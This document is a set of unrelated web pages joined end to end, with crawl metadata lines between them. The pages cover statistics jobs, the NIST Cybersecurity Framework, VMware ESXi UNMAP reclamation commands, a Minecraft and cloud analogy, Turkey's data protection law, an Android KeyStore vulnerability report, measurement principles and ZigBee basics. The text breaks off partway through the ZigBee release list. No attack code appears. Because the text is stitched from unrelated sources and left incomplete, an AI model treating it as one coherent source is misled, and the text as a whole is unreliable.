The field of statistics holds the key to almost everything we know in data analysis. The future of statistics is actually already here, as its natural progression from which spawned almost everything, we now consider to be data science, data analytics and even machine learning. There are infinite applications to business, government and even day to day life where the field of statistics can add value. The industry is mature and yet even still it’s growing, which is an excellent combination for newcomers in the field and aspiring mid-level professionals. Career opportunity is abundant, and pursuing continued education is quite attainable since the vast majority of universities offer statistics or statistics-related degree programs for masters and doctorates. Now let’s take a look at career considerations for statistics jobs and how that impacts employment opportunities.
Opportunities in the field of statistics are plentiful, and for job seekers with experience in data science and advanced analytics (for example) the demand for talent is extremely high. Almost every competitive organization worldwide is hiring talented workers with this background. More information about data science jobs can be found here. There are numerous career paths for professional statisticians that include, but are not limited to, academia (teaching and research) and commercial sectors such as technology and healthcare. The insurance industry continues to demand professionals in the actuarial sciences, a close cousin of statistics. Additionally, the field of statistics abounds with independent projects and research studies, and as data analytics continues its hyper-growth trajectory there will be almost infinite ways to apply a statistical skill set and education. Many social networks maintain statistical groups for networking. To stay informed on the latest happenings in the field and to search statistics jobs, icrunchdata offers many resources to the aspiring statistics professional and student. You can also find many statistics jobs here on icrunchdata by searching for the popular titles listed below or customizing your job search. And be sure to check out our pro tips for job seekers.
2. Statistical Modeler
3. Principal Statistician
4. Mathematical Statistician
5. Statistical Analyst
To bring our audience and the general community additional value, icrunchdata has started to release summary reports, trends, and relevant analysis related to jobs in the field including the data scientist salary report and the data science jobs index report.
1. Analytics Job Board Index
2. Artificial Intelligence Job Board Index
3. Big Data Job Board Index
4. Cybersecurity Job Board Index
5. Data Job Board Index
6. Data Analyst Job Board Index
7. Data Science Job Board Index
8. Hadoop Job Board Index
9. Internet of Things - IoT Job Board Index
10. IT Job Board Index
11. Machine Learning Job Board Index
12. SAS Job Board Index
Reach our highly engaged audience and start building your qualified talent pool today. Learn about pricing and features, select a product, and post your job in minutes. | <urn:uuid:4e8a0d2e-52b7-4dd9-999c-2ff9f658461b> | CC-MAIN-2022-40 | https://icrunchdata.com/statistics-jobs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00315.warc.gz | en | 0.933815 | 1,042 | 2.640625 | 3 |
The NIST Cybersecurity Framework: A Common Language for Cybersecurity Issues
The cybersecurity realm is overwhelming – the issues, the regulations, the changes, the threats, the persistence. We’re living in a world where we hear about new breaches every day. None of us can possibly know everything about all cybersecurity issues, and that’s okay. We’re all vulnerable and overwhelmed, but that’s no excuse not to prepare and continually develop your organization’s defenses. We believe that the NIST Cybersecurity Framework is a way to start building a common language and a method for understanding what the issues are and how they should be dealt with.
The core of the NIST Cybersecurity Framework includes:
- Functions – Organization of basic cybersecurity activities at their highest level
- Categories – Subdivisions of a function into groups of particular activities
- Subcategories – Subcategories further divide a category into specific outcomes of technical and/or management activities
- Informative References – Specific sections of standards, guidelines, and practices that illustrate a method to achieve the outcome
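To make the nesting concrete: the five functions at the top level of the framework core are Identify, Protect, Detect, Respond, and Recover. The snippet below pictures the hierarchy as a simple data structure; the categories shown are a small illustrative sample of the full catalog, not the complete list.

```python
# A sliver of the NIST CSF core as nested data. The five functions are
# the real top level; the categories are a small sample, with their
# standard identifiers.
FRAMEWORK_CORE = {
    "Identify": {"ID.AM": "Asset Management", "ID.RA": "Risk Assessment"},
    "Protect":  {"PR.AC": "Identity Management and Access Control",
                 "PR.AT": "Awareness and Training"},
    "Detect":   {"DE.AE": "Anomalies and Events",
                 "DE.CM": "Security Continuous Monitoring"},
    "Respond":  {"RS.RP": "Response Planning"},
    "Recover":  {"RC.RP": "Recovery Planning"},
}

def categories(function):
    # List the category identifiers under one function, sorted.
    return sorted(FRAMEWORK_CORE.get(function, {}))
```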
What is the cybersecurity maturity of your organization? It’s an important question to ask and answer honestly, especially when considering the Framework Implementation Tiers:
- Partial – Informal, reactive, limited awareness
- Risk Informed – Approved but not implemented, the staff has adequate resources to perform their cybersecurity duties, not formalized in its capabilities to interact and share information externally
- Repeatable – Risk management is a formal function and updated regularly, changes in business requirements are reflected in the organization-wide cybersecurity practices, your organization understands its dependencies on partners and interacts accordingly
- Adaptive – The cybersecurity practices adapt based on lessons learned and predictive indicators which results in continuous improvement, adapts to a changing landscape in a timely manner, cybersecurity risk management is part of the organizational culture, communication, and interaction with partners occurs before a cybersecurity event occurs
Healthcare organizations desperately need individuals who will volunteer to lead the conversation about cybersecurity issues; you don’t have to be a cybersecurity expert, just a good communicator. Our hope? In 5 years, everyone within an organization will understand the language of cybersecurity and will be involved in the cybersecurity conversation. It’s not just IT’s issue, or an executive’s responsibility, or the administration’s problem. Can you be the person at your organization to step up and lead the conversation?
To learn more about our HIPAA compliance services, contact us today. | <urn:uuid:84c55055-6c19-4f6d-a24d-69050285ba75> | CC-MAIN-2022-40 | https://kirkpatrickprice.com/webinars/using-nist-cybersecurity-framework-to-protect-phi/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00315.warc.gz | en | 0.922437 | 515 | 2.515625 | 3 |
Space reclamation API helps storage partners to efficiently reclaim deleted space in coordination with vSphere. It is a garbage collection process for thin volumes to help storage arrays reuse deleted space.
ESXi 5.0 Background: VMware introduced a new feature in vSphere 5.0 called “space reclamation” as part of block VAAI thin provisioning. This feature was designed to efficiently reclaim deleted space to meet continuing storage needs. ESXi 5.0 issued UNMAP commands for space reclamation during several operations. Because of varying or slow response time from storage devices, VMware recommended disabling UNMAP on ESXi 5.0 hosts with thin provisioned LUNs.
In ESX 5.0 U1, VMware implemented the vmkfstools command with a revised -y option, enabling customers to reclaim unused space during their maintenance window, provided that their storage arrays support UNMAP for hardware acceleration. Because system performance is less of a concern during a maintenance window, customers could run the vmkfstools command as needed to consolidate storage. Partners with T10-compliant storage arrays that implement the UNMAP command could take advantage of this feature.
vSphere issues the UNMAP command for space reclamation during several operations, such as Storage vMotion and snapshot consolidation. UNMAP is issued to storage devices in critical regions with the expectation that the operation will complete quickly. However, the implementation and response times for this command to ESX vary significantly among a sample set of storage arrays from the ecosystem. This variation of response times in critical regions can potentially interfere with other services.
When the UNMAP is issued on the free blocks in a volume, it is required to ensure that those blocks are not allocated to another file until the UNMAP operation completes. The mechanism used is to allocate these blocks to a temporary file.
In ESX 5.0 U1 and ESX 5.1, the temp file(s) were created at the start of the operation and then an UNMAP was issued to all the blocks that were allocated to these temp files. If the temp file(s) took up all the free blocks in the volume, then any other operation that required a block allocation would fail. To prevent this scenario, we allowed the user to specify the percentage of the free blocks the temp file(s) would use.
• Why did we have to create these large temp files?
Let’s assume that you create a temp file of size 200 MB – assuming 1 MB vmfs block size. This file would contain 200 blocks. If we issue UNMAP on all 200 blocks and place them back on the free list, the next time you create another temp file of size 200 MB, the same blocks that were just "unmapped" could be allocated to this file as well. Therefore, we would not be making any progress in issuing UNMAP to all the unused blocks in the volume. So it is required to allocate all the free blocks in one instance and issue UNMAP on all of them.
• What is being changed in ESX 5.5?
We have introduced new kernel interfaces in ESX 5.5 that allow the user to ask for blocks beyond a user-specified block address in the file system (see below for the detailed implementation). Using these interfaces, we can ensure that the blocks allocated to a file were never allocated to this file previously.
Therefore, we would be able to create any size temp files and only issue UNMAP to the blocks allocated to that file and yet be sure that we can issue UNMAP on all the free blocks in the volume.
The user options have changed accordingly. The user now only specifies the size of the temp file to be created. Using any specified size we can issue UNMAPs on all the free blocks in a volume.
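The allocate-beyond-the-last-address scheme can be pictured with a toy simulation. This is an illustration of the idea, not VMware’s actual kernel code: because the high-water mark only moves forward, a block freed by one iteration is never handed to a later temp file, so every free block is unmapped exactly once regardless of the temp file size.

```python
# Toy model of the ESX 5.5 approach: repeatedly "create" a small temp
# file from free blocks strictly above a moving high-water mark, issue
# UNMAP on those blocks, and release them.
def reclaim(free_blocks, temp_file_size):
    unmapped = []
    high_water = -1
    while True:
        batch = sorted(b for b in free_blocks if b > high_water)[:temp_file_size]
        if not batch:
            break
        unmapped.extend(batch)   # the real system issues UNMAP here
        high_water = batch[-1]   # mark only moves forward, so no block repeats
    return unmapped

print(reclaim({2, 5, 9, 11, 14}, temp_file_size=2))  # [2, 5, 9, 11, 14]
```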
We are integrating this operation within the esxcli command framework. The vmkfstools –y option is deprecated for external use.
We have also enhanced the UNMAP command implementation to support multiple block descriptors (in ESX 5.1 we only issued one block descriptor per UNMAP command). We now issue up to 100 block descriptors depending on the storage target capabilities specified in the Block Limits VPD (B0) page.
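The benefit of multiple block descriptors is that contiguous runs of free blocks can be coalesced into extents and packed, up to 100 at a time, into a single command. A sketch of that batching logic (illustrative, not ESXi source):

```python
# Coalesce sorted block numbers into (start, length) extents, then pack
# at most `max_descriptors` extents per UNMAP command -- mirroring the
# "up to 100 block descriptors" behavior described above.
def to_extents(blocks):
    blocks = sorted(blocks)
    if not blocks:
        return []
    extents, start, length = [], blocks[0], 1
    for prev, cur in zip(blocks, blocks[1:]):
        if cur == prev + 1:
            length += 1
        else:
            extents.append((start, length))
            start, length = cur, 1
    extents.append((start, length))
    return extents

def unmap_commands(blocks, max_descriptors=100):
    extents = to_extents(blocks)
    return [extents[i:i + max_descriptors]
            for i in range(0, len(extents), max_descriptors)]
```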
ESXCLI has a new command “unmap” under the “esxcli storage vmfs” namespace, which users can use to unmap the free blocks from the VMFS volume with a given UUID or label.
esxcli storage vmfs unmap <--volume-label=<str>|--volume-uuid=<str>> [--reclaim-unit=<long>]
-n|--reclaim-unit=<long>: Number of VMFS blocks that should be unmapped per iteration.
-l|--volume-label=<str> : The label of the VMFS volume to unmap the free blocks.
-u|--volume-uuid=<str> : The uuid of the VMFS volume to unmap the free blocks.
Sample uses are:
# esxcli storage vmfs unmap --volume-label datastore1 --reclaim-unit 100
# esxcli storage vmfs unmap -l datastore1 -n 100
# esxcli storage vmfs unmap --volume-uuid 515615fb-1e65c01d-b40f-001d096dbf97 --reclaim-unit 500
# esxcli storage vmfs unmap -u 515615fb-1e65c01d-b40f-001d096dbf97 -n 500
# esxcli storage vmfs unmap -l datastore1
# esxcli storage vmfs unmap -u 515615fb-1e65c01d-b40f-001d096dbf97
Frequently Asked Questions
Will this implementation still issue UNMAP to non-mapped LBAs?
This implementation will still issue UNMAP to all blocks that are considered by the vmfs volume to be “free”. That includes any blocks that were never written to and hence would be non-mapped at the storage back-end.
What happens to the current recommendation of running UNMAP in the maintenance window?
With ESXi 5.5, we recommend that customers use UNMAP in the normal mode of ESXi operation. There is no restriction limiting its use to a maintenance window.
Recently I was reading this article in the New York Times about Minecraft. It’s a story about how Minecraft is changing the way children play, learn and create things. It does so by bringing them into a digital environment that provides the freedom to let them fully design their own world, complete with houses, vehicles and more. Players start mining and expand their environment by chopping trees, mining blocks and creating their own tools. In Minecraft, the article goes, you’re provided with a toolbox to do so, which allows you to be creative and build things. The physical equivalent of Minecraft is somewhat like Lego.
Fortunately, in the Minecraft world, things look simple but can get pretty advanced as well. By using a resource called ‘redstone’, players can build their own machines to make life easier, automating things that are time-consuming or boring. The components used to do this are very similar to the components that are used to design computers – logic gates and digital signals. What’s more, just like Lego, you have to buy the blocks beforehand and people will complain if you need a newer set because the old one doesn’t have the blocks that you need.
Pickaxes and Chef
As someone working in technology during the day but who loves to play Minecraft in my free time, I couldn’t help seeing a parallel with IT infrastructure. On a daily basis, we are providing building blocks and seemingly simple tools that allow customers to build their own solutions as well as to automate things that are time-consuming or boring. What if the cloud is our Minecraft?
In the cloud, the focus is on flexibility and automation. We provide you with an environment as well as a number of (basic and more advanced) tools to create whatever you like. You’re not using pickaxes or furnaces but, rather, Ansible or Chef. Sometimes – like in the Minecraft world – our customers come up with ways to use our infrastructure we didn’t even think about yet. Seemingly simple building blocks can be used to design very complex things. After all, at the end of the day the device you’re reading this on is just made of logic gates and digital signals.
In Minecraft, the player doesn’t deal with physical things. (S)he doesn’t have to manipulate items or click things together – the way we used to play with Lego or other construction toys. Lego solved this issue smartly by designing Minecraft Lego sets. So whenever it makes sense, we can choose to go for the hardware. Because it fits better, or you don’t need the flexibility, or just because it’s easier to ask for a box of Legos. This is not too different from IaaS: whenever you don’t need that flexibility in your cloud infrastructure, you can go for bare metal or more traditional dedicated servers.
It’s not just a game
There are some situations where that parallel goes off track. I can’t combine the things I built in my Minecraft world with the physical Lego set. It’s not yet possible to create a single build that connects those worlds. In IaaS, this is different. Customers can select bare metal, cloud and other infrastructure components, combining them whenever it makes sense to do so. And in infrastructure it often does. The challenge is for the supplier to provide those simple tools that allow this to be done easily. Another huge difference is that your business might be dependent on your cloud whereas what you do in your Minecraft world has little real-world business impact. Carelessly mining blocks in a game can be fun but business-critical infrastructure needs to be well thought-out and carefully designed.
One last important difference is finding your way. In Minecraft, you’re dropped into this new world and part of the game is exploring and figuring out how to survive. In IT infrastructure, there’s more guidance and help available. This is where Leaseweb comes in. Talk to us, and we’ll help you figure out what combination of Lego or Minecraft – or both – you need, all around the (real) world. We’ll even help you build it, unless you want to connect those blocks together yourself!
Turkey’s Law on Protection of Personal Data No. 6698
Turkey’s Law on Protection of Personal Data No. 6698, also known as the Data Protection Law for short, is a comprehensive data protection law that was passed in Turkey in 2016. Prior to the passing of the Data Protection Law, Turkey had yet to adopt any legislation related to the protection of data privacy rights. As such, Turkey sought to provide the citizens of their country with data protection rights on the same level as those offered by the EU’s General Data Protection Regulation or GDPR. To this end, the Data Protection Law outlines the various restrictions and responsibilities that data controllers must abide by when processing the personal data of Turkish citizens.
What is the scope and applicability of the Data Protection Law?
Unlike the General Data Protection Regulation, Turkey’s Data Protection Law does not contain any specific territorial scope. Instead, the Data Protection Law applies to:
- Natural persons whose personal data is processed
- Natural or legal persons who process such data fully or partially through automatic means, or through non-automatic means provided the processing is part of a data registry system, as set out in the Law.
In terms of the material scope of the law, the Data Protection Law defines the processing of personal data as “an operation that is carried out on personal data such as collection, recording, storage, retention, alteration, re-organization, disclosure, transferring, taking over, making retrievable, classification, or preventing the use thereof, fully or partially through automatic or non-automatic means, provided the process is a part of any data registry system”. As such, any structured system that is used to facilitate access to the personal data of Turkish citizens according to a specific criterion will fall under the scope of the Data Protection Law.
What are the requirements of Data controllers under the Data Protection Law?
As is the case with many other privacy laws around the world, the Data Protection Law establishes various data protection principles that data controllers must adhere to when processing the personal data of data subjects. These principles include:
- Personal data must be processed both lawfully and fairly.
- Personal data must be accurate and where necessary, kept up to date.
- Personal data must be processed for specific, explicit, and legitimate purposes.
- Personal data must be relevant, limited, and proportionate to the purposes for which they are processed.
- Personal data may only be retained for the period of time that is determined by the law, or for the period deemed necessary for the intended purposes of data processing.
- Data controllers are obliged to prevent both the unlawful processing and access of personal data, and ensure the retention of personal data.
- Data controllers are obliged to carry out necessary audits to ensure that they maintain compliance with the law.
- Data controllers are required to comply with data transfer conditions for data transfers within the country, as well as cross-border data transfers.
- Data controllers are also responsible for creating a data inventory for all personal data processed within Turkey. This data inventory must include identifying information, data categories, the intended purpose of data processing, data subject groups, recipient or recipient groups to which personal data may be transferred, information concerning whether the relevant data category is transferred abroad, data security measures that are to be undertaken by associated data controllers, and the maximum period of time for which personal data will be processed.
What are the rights of data subjects under the Data Protection Law?
Under the Data Protection Law, data subjects are granted a variety of rights in accordance with the law. These rights include the following:
- The right for a data subject to request information concerning whether their personal data has been or is being processed.
- The right to request information related to how their data was processed, if a data subject’s personal data has been processed.
- The right to request information related to the intended purpose for data processing, as well as whether a data subject’s data has been used in a manner that is consistent with this intended purpose.
- The right to request information regarding the identities of natural or legal persons with whom a data subject’s personal data may have been shared.
- The right to request that a data controller correct, erase, or remove personal data pertaining to a data subject.
- The right to request information confirming whether or not a data subject’s data is transferred, as well as the right to request information relating to whether or not the associated data controller has advised any third parties to which this data has been transferred concerning the correction, erasure, and removal of said data, if such changes are requested by the data subject.
- The right to object to any negative consequence that may result from a data subject’s data being analyzed exclusively through the use of automated systems.
- The rights to access, rectification, erasure, and to be informed.
- The right to seek compensation in the event that any of the rights stated above are violated.
In terms of sanctions and penalties for non-compliance, data controllers who are found to be in violation are subject to a variety of punishments. These include a prison sentence of six months to four years and administrative fines ranging from TRY 5,000 ($575) to TRY 1 million ($115,190), as well as the right for data subjects to claim compensation for the unlawful collection or processing of their personal data. What’s more, there are also sector-specific fines that can be levied against businesses and organizations that violate the law, which can reach up to 3% of an organization’s net sales for the calendar year.
As Turkey was one of the many countries around the world that had yet to pass comprehensive data privacy legislation prior to 2016, the Data Protection Law serves as the primary safeguard of the data privacy rights of Turkish citizens. Because the goal was to provide Turkish citizens with the same level of data protection as is offered by the EU’s General Data Protection Regulation, Turkey’s Data Protection Law imposes steep punishments on data controllers who are found to be in non-compliance. To this end, the law helps ensure that the data protection rights of Turkish citizens are effectively protected.
Security researchers at IBM have gone public about a critical security vulnerability in the Android operating system, that could allow hackers to remotely execute code on users’ devices and steal sensitive information.
The flaw, which was discovered nine months ago by researchers of the Application Security team at IBM but has only now been made public, affects everyone who is not running the most up-to-date version of Android – version 4.4, known as KitKat.
Roee Hay, who leads the application security research team at IBM, said that the reason why it has taken so long for details of the security hole to be made public is that his group believes in responsible disclosure, and has worked with the Android security team at Google to ensure that a patch was made available for KitKat.
Normally security researchers who discover vulnerabilities are chomping at the bit to announce their discovery, and it wouldn’t have been a surprise to see this one announced at the same time as the fix was rolled out by Google.
But things are very different when it comes to Android, because of the difficulties that exist in rolling out patches to users of the many different devices running the operating system – a point that Hay acknowledged in his article:
“Considering Android’s fragmented nature and the fact that this was a code-execution vulnerability, we decided to wait a bit with the public disclosure.”
There is good reason to be concerned.
Even though the latest version of Android is protected against the vulnerability – there are still many Android users who are running older versions of the operating system and are potentially at risk.
The latest statistics from Google show that KitKat is only being used by 13.6% of Android users.
What IBM’s researchers have discovered is a stack buffer overflow vulnerability in the Android KeyStore service, which is responsible for storing and securing the device’s cryptographic keys.
If successfully exploited, the vulnerability could allow malicious code to execute which could:
- Leak the device’s lock credentials. Since the master key is derived from the lock credentials, whenever the device is unlocked, ‘Android::KeyStoreProxy::password’ is called with the credentials.
- Leak decrypted master keys, data and hardware-backed key identifiers from the memory.
- Leak encrypted master keys, data and hardware-backed key identifiers from the disk for an offline attack.
- Interact with the hardware-backed storage and perform crypto operations (e.g., arbitrary data signing) on behalf of the user.
The only silver lining is that IBM’s researchers say that they have seen no evidence to date that the vulnerability has been exploited in the wild.
As Optimal Security reported last week, Google is currently rolling out the latest version of KitKat (4.4.4) to its own Nexus smartphones and tablets, in order to protect against another serious vulnerability in OpenSSL, and Android Lollipop (if that’s what the next big version gets called) will hopefully be available later this year.
But however good Google makes the future incarnations of its mobile operating system, there will still be a lot of users of older flavors of Android left running insecure versions with no clear path for updating and patching their phones and tablets. I, for one, wouldn’t be surprised to see those older Android devices increasingly targeted by hackers.
This article originally appeared on the Lumension blog.
Found this article interesting? Follow Graham Cluley on Twitter to read more of the exclusive content we post. | <urn:uuid:cdf44134-411a-409d-8a23-990a56401f41> | CC-MAIN-2022-40 | https://grahamcluley.com/running-android-kitkat-hackers-steal-info-phone/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00315.warc.gz | en | 0.954906 | 727 | 2.765625 | 3 |
If you want to make better decisions, using data to inform your decision-making is the way to go. Organizations largely understand this reality in principle, if not always in practice. But it’s not enough to just gather data; you have to know how to use it, and unfortunately, most organizations don’t.
Fortunately, quantitative analysis doesn’t have to be that difficult. We’ve found over the decades that much of what interferes with data-driven decision-making is confusion, misunderstanding, and misconceptions about measurement in general. As our work with leading public and private entities across the globe has proven, these obstacles can be overcome. Anything can be measured, and if you can measure it, you can improve your decisions.
Below are seven simple principles for making better measurements that form the basis of our methodology, Applied Information Economics (AIE), and – if applied – can quickly improve the quality of the decisions you make (Figure 1).
7 Simple Rules for Measuring Anything – Hubbard Decision Research
Rule 1: If It Matters, It Can Be Measured
Nothing is impossible to measure. We’ve measured concepts that people thought were immeasurable, like customer/employee satisfaction, brand value and customer experience, reputation risk from a data breach, the chances and impact of a famine, and even how a director or actor impacts the box office performance of a movie. If you think something is immeasurable, it’s because you’re thinking about it the wrong way.
- If it matters, it can be observed or detected.
- If it can be detected, then we can detect it as an amount or in a range of possible amounts.
- If it can be detected as a range of possible amounts, we can measure it.
If you can measure it, you can then tell yourself something you didn’t know before. Case in point: the Office of Naval Research and the United States Marine Corps wanted to forecast how much fuel would be needed in the field. There was a lot of uncertainty about how much would be needed, though, especially considering fuel stores had to be planned 60 days in advance. The method they used to create these forecasts was based on previous experience, educated assumptions, and the reality that if they were short on fuel, lives could be lost. So, they had the habit of sending far more fuel to the front than they needed, which meant more fuel depots, more convoys, and more Marines in harm’s way.
After we conducted the first round of measurements, we found something that surprised the Marines: the biggest single factor in forecasting fuel use was whether the roads the convoys took were paved or gravel (figure 1).
We also found that the Marines were measuring variables that provided a lot less value. More on that later.
Rule 2: You Have More Data Than You Think
Many people fall victim to the belief that to make better decisions, you need more data – and if you don’t have enough data, then you can’t and shouldn’t measure something.
But you actually have more data than you think. Whatever you’re measuring has probably been measured before. And, you have historical data that can be useful, even if you think it’s not enough.
It’s all about asking the right questions, questions like;
- What can email traffic tell us about teamwork?
- What can website behavior tell us about engagement?
- What can publicly available data about other companies tell us about our own?
Rule 3: You Need Less Data Than You Think
Despite what the Big Data era may have led you to believe, you don’t need troves and troves of data to reduce uncertainty and improve your decision. Even small amounts of data can be useful. Remember, if you know almost nothing, almost anything will tell you something.
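A concrete example of how little data can still be informative is the "Rule of Five": in a random sample of just five items, there is a 93.75% chance that the true population median lies between the sample's smallest and largest values, because the chance that all five land on the same side of the median is 2 x (1/2)^5 = 6.25%. The Python sketch below checks this by simulation against an assumed toy population; the specific numbers are illustrative, not from the article.

```python
import random
import statistics

def rule_of_five_hit_rate(population, trials=20_000, seed=1):
    """Fraction of random 5-item samples whose min..max range
    contains the true population median."""
    rng = random.Random(seed)
    true_median = statistics.median(population)
    hits = 0
    for _ in range(trials):
        sample = rng.sample(population, 5)
        if min(sample) <= true_median <= max(sample):
            hits += 1
    return hits / trials

# Assumed toy population: e.g., minutes per week spent on some task.
pop_rng = random.Random(0)
population = [pop_rng.gauss(40, 15) for _ in range(10_000)]

rate = rule_of_five_hit_rate(population)
print(f"median captured in {rate:.1%} of 5-item samples")
```

The simulated rate lands close to the theoretical 93.75%, and the argument does not depend on the population being normal: it holds for any population with a well-defined median.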
Rule 4: We Measure to Reduce Uncertainty
One major obstacle to better quantitative analysis is a profound misconception of measurement. For that, we can blame science, or at least how science is portrayed to the public at large. To most people, measurement should result in an exact value, like the precise amount of liquid in a beaker, or a specific number of this, that, or the other.
In reality, though, measurements don’t have to be that precise to be useful. The key purpose of measurement is to reduce uncertainty. Even marginal reductions in uncertainty can be incredibly valuable.
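To make "reducing uncertainty" tangible: a 90% confidence interval for a mean narrows roughly with the square root of the number of observations, so the first handful of measurements does most of the work. Below is a minimal Python sketch using an assumed toy quantity (mean 50, standard deviation 12) and the normal approximation; it is an illustration, not a statement about any real dataset.

```python
import math
import random
import statistics

def ninety_pct_interval(samples):
    """Approximate 90% confidence interval for the mean,
    using the normal approximation (z = 1.645)."""
    mean = statistics.fmean(samples)
    half = 1.645 * statistics.stdev(samples) / math.sqrt(len(samples))
    return mean - half, mean + half

rng = random.Random(42)
# Assumed "true" process: some quantity averaging 50 units, sd 12.
observations = [rng.gauss(50, 12) for _ in range(100)]

for n in (5, 20, 100):
    lo, hi = ninety_pct_interval(observations[:n])
    print(f"n={n:3d}: 90% CI ({lo:5.1f}, {hi:5.1f}), width {hi - lo:.1f}")
```

Note that going from 5 to 20 observations buys a larger absolute reduction in interval width than going from 20 to 100: the early, cheap measurements deliver the biggest uncertainty reduction.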
Rule 5: What You Measure Most May Matter Least
What if you already make measurements? Let’s say you collect data and have some system – even an empirical, statistics-based quantitative method – to make measurements. Your effectiveness may be severely hampered by measuring things that, at the end of the day, don’t really matter.
By “don’t really matter,” we mean that the value of these measurements – the insight they give you – is low because the variable isn’t very important or isn’t worth the time and effort it took to measure it.
What we’ve found is a bit unsettling to data scientists: some of the things organizations currently measure are largely irrelevant or outright useless – and can even be misleading. This principle represents a phenomenon called “measurement inversion” (Figure 2):
Unfortunately, it’s a very common phenomenon. The Marine Corps fell victim to it with their fuel forecasts. They thought one of the main predictors of fuel use for combat vehicles like tanks and Light Armored Vehicles (LAV) was the chance that they would make contact with the enemy. This makes sense; tanks burn more fuel in combat because they move around a lot more, and their gas mileage is terrible. In reality, though, that variable didn’t move the needle that much.
In fact, the more valuable predictive factor was whether or not the combat vehicle had been in a specific area before. It turns out that vehicle commanders, when maneuvering in an uncertain area (i.e. landmarks, routes, and conditions in that area they had never encountered before), tend to keep their engines running for a variety of reasons. That burns fuel.
(We also discovered that combat vehicle fuel consumption wasn’t as much of a factor as that of convoy vehicles, like fuel trucks, because there were fewer than 60 tanks in the unit we analyzed, versus over 2,300 non-combat vehicles.)
Rule 6: What You Measure Least May Matter Most
Much of the value we’ve generated for our clients has come through measuring variables that the client thought were either irrelevant or too difficult to measure. But often, these variables provide far more value than anyone thought!
Fortunately, you can learn how to measure what matters the most. The chart below demonstrates some of the experiences we’ve had with combating this phenomenon with our clients (Figure 3):
This isn’t to say that the variables you’re measuring now are “bad.” What we’re saying is that uncertainty about how “good” or “bad” a variable is (i.e., how much value it has for the predictive power of the model) is one of the biggest sources of error in a model. In other words, if you don’t know how valuable a variable is, you may be making a measurement you shouldn’t – or may be missing out on making a measurement you should.
Rule 7: You Don’t Have to Beat the Bear
When making measurements, the best thing to remember is this: If you and your friends are camping, and suddenly a bear attacks and starts chasing you, you don’t have to outrun the bear – you only have to outrun the slowest person.
In other words, the quantitative method you use to make measurements and decisions only has to beat the alternative. Any empirical method you incorporate into your process can improve it if it provides more practical and accurate insight than what you were doing before.
The bottom line is simple: Measurement is a process, not an outcome. It doesn’t have to be perfect, just better than what you use now. Perfection, after all, is the perfect enemy of progress.
Incorporate these seven principles into your decision-making process and you’re already on your way to better outcomes.
Learn how to start measuring variables the right way – and create better outcomes – with our two-hour Introduction to Applied Information Economics: The Need for Better Measurements webinar. $100 – limited seating. | <urn:uuid:fa9a6e0b-ae34-4011-9c49-35e8915a54c7> | CC-MAIN-2022-40 | https://hubbardresearch.com/7-simple-principles-for-measuring-anything/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00315.warc.gz | en | 0.950495 | 1,791 | 2.515625 | 3 |
Built on the IEEE 802.15.4 standard, ZigBee is an open global specification for high-level communication protocols used in wireless personal area networks (WPANs), home area networks (HANs) and machine-to-machine (M2M) networks built around small, low-power radios. Overseen by the ZigBee Alliance and first introduced by Philips Semiconductors, the protocol first saw the light of day in 1998. Standardization followed in 2004, with subsequent revisions in 2006 and 2007. An aside for the non-apiologists among us: a “zigbee” is a portmanteau describing a bee’s “waggle dance,” used to communicate to hivemates the direction where they must fly to find a food source.
ZigBee ABCs and XYZs
ZigBee can transmit from one network device to another over a line-of-sight distance of approximately 70 meters (230 feet); greater distances can be realized by “daisy-chaining,” or mesh networking, one node to the next. The protocol even features low latency, despite the fact that ZigBee consumes less power than Bluetooth (which limits transmission distance) and is optimized for long battery life, measured in months and years. ZigBee operates on unlicensed radio bands: 2.4 GHz worldwide, 915 MHz in the U.S. and Australia, 868 MHz in Europe and 784 MHz in China.
ZigBee utilizes packets with a maximum size of 128 bytes (maximum payload of 104 bytes), transported bidirectionally. These are small packets, true, but the applications best suited to the ZigBee standard typically do not require high data rates. IEEE 802.15.4 supports both 64-bit IEEE addresses and 16-bit short addresses. Every device in the ZigBee network is uniquely identified by a 64-bit address, much like a unique IP address, and once short addresses are provisioned, the network can support up to 65,000+ nodes or slaves. These nodes can be managed by a single remote control. Superframe time synchronization is an option, which can incorporate a guaranteed time slot mechanism for high-priority messages.
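Working from the numbers above (128-byte frames, 104-byte maximum payload, 250 Kbps), a quick back-of-the-envelope calculation shows why ZigBee fits intermittent sensor traffic rather than bulk transfer. The Python sketch below deliberately ignores MAC/PHY overhead, acknowledgments and inter-frame spacing, so the airtime figures are optimistic approximations:

```python
MAX_FRAME_BYTES = 128      # IEEE 802.15.4 maximum frame size
MAX_PAYLOAD_BYTES = 104    # maximum payload per frame, per the text
DATA_RATE_BPS = 250_000    # 250 Kbps on the 2.4 GHz band

def frames_needed(payload_bytes):
    """Frames required to carry a payload, given the per-frame cap."""
    return -(-payload_bytes // MAX_PAYLOAD_BYTES)  # ceiling division

def airtime_seconds(payload_bytes):
    """Very rough time on air: every frame is billed at the full
    128-byte size; MAC overhead, ACKs and gaps are ignored."""
    bits = frames_needed(payload_bytes) * MAX_FRAME_BYTES * 8
    return bits / DATA_RATE_BPS

print(f"payload efficiency: {MAX_PAYLOAD_BYTES / MAX_FRAME_BYTES:.1%}")
for size in (50, 1_000, 100_000):
    print(f"{size:>7} bytes -> {frames_needed(size):>4} frames, "
          f"~{airtime_seconds(size) * 1000:.0f} ms on air")
```

Even this rosy model puts a 100 KB transfer at roughly four seconds of airtime, which is fine for occasional sensor readings and hopeless for media streaming.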
Common applications include data networking and home/building/industrial automation, e.g., starting the home Blu-ray disc player or TiVo, extinguishing/dimming office lights, engaging a warehouse’s security system, utility metering, etc., all at the touch of a button. Users merely use the Internet for dial-in access. Designed for use in low-data-rate applications (defined as a range of 20 Kbps to 250 Kbps) where long battery life is needed, ZigBee is best suited for intermittent data transmissions from an input device or sensor. Among the protocol’s most attractive attributes is its capability to operate efficiently in areas with a high degree of radio-frequency congestion and interference.
ZigBee standards and releases include the following:
- ZigBee 2004 — the original standard, defined as ZigBee 1.0 and publicly released in June 2005.
- ZigBee 2006 — this subsequent version, released in September 2006, introduced the concept of a cluster library.
